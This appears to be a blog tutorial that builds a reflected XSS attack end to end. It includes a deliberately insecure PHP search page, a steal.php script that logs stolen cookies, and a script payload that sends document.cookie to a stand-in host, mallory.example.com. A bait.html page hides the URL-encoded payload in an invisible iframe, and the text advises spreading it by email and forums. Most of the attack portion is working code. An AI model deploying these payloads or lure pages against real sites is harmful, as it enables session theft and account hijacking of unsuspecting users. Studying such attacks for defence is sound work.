Just wondering about how powerful XSS can be and how to utilize it gracefully, I decide to implement a simple XSS attack scheme.

First, make an insecure site, say a search engine:

<?php
//setcookie('username', 'Bob Smith');
//setcookie('country', 'United States');
    function get_cookie()
    {
        if (empty($_COOKIE))
            return 'No cookie';

        $result = '';
        foreach ($_COOKIE as $key => $value)
            $result = $result.$key.'='.$value.',';
        return $result;
    }

    function get_query()
    {
        if (isset($_GET['query']))
            return $_GET['query'];
        else
            return 'No query';
    }
?>
<html>
    <head>
        <title>A Weak Search Engine</title>
    </head>
    <body>
        <p>Cookie: <span id="cookie"><?php echo get_cookie();?></span></p>
        <p>Search Query: <span id="query"><?php echo get_query();?></span></p>
    </body>
</html>

This search engine will show cookies (to facilitate visualization) and the search query (but no search results…). That’s a reasonable setting.

Why is this search engine insecure? Because it doesn’t filter the search query but directly displays it on the response page. Now we’ll utilize it. Without loss of generality, we let the domain of it be search.example.com.

Now a malicious user can maintain a website mallory.example.com. On this site she has a PHP script steal.php:

<?php
    $fp = fopen('/tmp/mallory.txt', 'w');
    fwrite($fp, $_GET['cookie']);
    fclose($fp);

    $im = file_get_contents('/tmp/im.png');
    header('content-type: image/png');
    echo $im;
?>

steal.php will record the ‘cookie’ parameter permanently and returns an image.

The use of steal.php will be obvious when we introduce the search query:

newest laptop<script type="text/javascript">var i = document.createElement('img');i.src = 'http://mallory.example.com/steal.php?cookie='+document.cookie;</script>

We use the img tag because it can cross domain. If a logged-in user has ever made such a search query, then his cookies will be stolen.

How to entice the user to make such a query? By embedding the link inside a hidden iframe. We can make a very innocent page containing a hidden iframe. No need to use client-side script. So the same origin policy for iframe doesn’t help. As soon as the user activates the iframe by visiting the containing page, his cookies get stolen.

The enticing page is called bait.html, which can reside on any server (not necessary to be search.example.com or mallory.example.com).

<html>
    <head>
        <title>An innocent page</title>
    </head>
    <body>
        <p>This page looks very innocent, isn't it?</p>
        <iframe style="display:none;" src="http://search.example.com/?query=%6E%65%77%65%73%74%20%6C%61%70%74%6F%70%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%69%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%69%6D%67%27%29%3B%69%2E%73%72%63%20%3D%20%27%68%74%74%70%3A%2F%2F%6D%61%6C%6C%6F%72%79%2E%65%78%61%6D%70%6C%65%2E%63%6F%6D%2F%73%74%65%61%6C%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E"></iframe>
    </body>
</html>

The search query is encoded so that it won’t be too obvious that someone is doing bad even the source code is viewed.

The whole attack goes as follows. Mallory will spread the page bait.html. If a user Bob, who has ever logged in search.example.com, visits bait.html, he will activate the hidden iframe. Thereby he sends the malicious query to search.example.com and leaks his cookies. And what’s even worse, he won’t notice this on page bait.html.

This is a traditional nonpermanent/reflected XSS attack (because the target website reflects the malicious query).

The conclusion is that XSS attack is very flexible and can be conducted in three steps. First, find a vulnerable page on the target website. Second, make a malicious query. Third, hide the malicious query inside an innocent-looking page and widely spread it (via email, forums, etc.). Actually the third step looks more like CSRF, or more precisely described as CSRF is used to help XSS. If you have better ways to lure the victim to send the malicious query, then the first two steps suffice.

The related code is provided: link1 link2